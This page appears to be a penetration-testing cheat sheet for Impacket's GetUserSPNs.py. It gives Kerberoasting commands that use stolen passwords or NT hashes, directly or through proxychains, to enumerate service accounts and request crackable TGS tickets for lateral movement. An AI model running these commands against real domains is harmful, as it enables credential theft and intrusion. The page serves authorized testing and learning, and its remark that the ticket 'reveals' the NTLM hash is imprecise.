Skip to main content

GetUserSPNs.py

When to Use

Useful in post-compromise enumeration. If you acquire user passwords or hashes for accounts from SAM or LSASS, you can use these credentials to see if there are any Service Principals (service accounts) associated with user accounts.

Often times, Service Principals may be over-privileged or delegated to privileged resources. GetUserSPNs.py will allow the operator to request a Ticket-Granting-Service ticket, thereby revealing the Service Principal's NTLM hash, which may be able to be cracked. You could then pass the cracked service principal's password around the network.



Usage Examples

Password Authentication

# List any service principals associated with the user
GetUserSPNs.py -dc-ip domain-controller-ip 'domain.tld/username:password'

# Request a TGS
GetUserSPNs.py -dc-ip domain-controller-ip 'domain.tld/username:password' -request

# Post-compromise via a proxy host
proxychains -q GetUserSPNs.py -dc-ip domain-controller-ip 'domain.tld/username:password'
proxychains -q GetUserSPNs.py -dc-ip domain-controller-ip 'domain.tld/username:password' -request


Pass the Hash

# List any service principals associated with the user
GetUserSPNs.py -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username'

# Request a TGS
GetUserSPNs.py -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username' -request

# Post-compromise via a proxy host
proxychains -q GetUserSPNs.py -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username'
proxychains -q GetUserSPNs.py -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username' -request
Back to top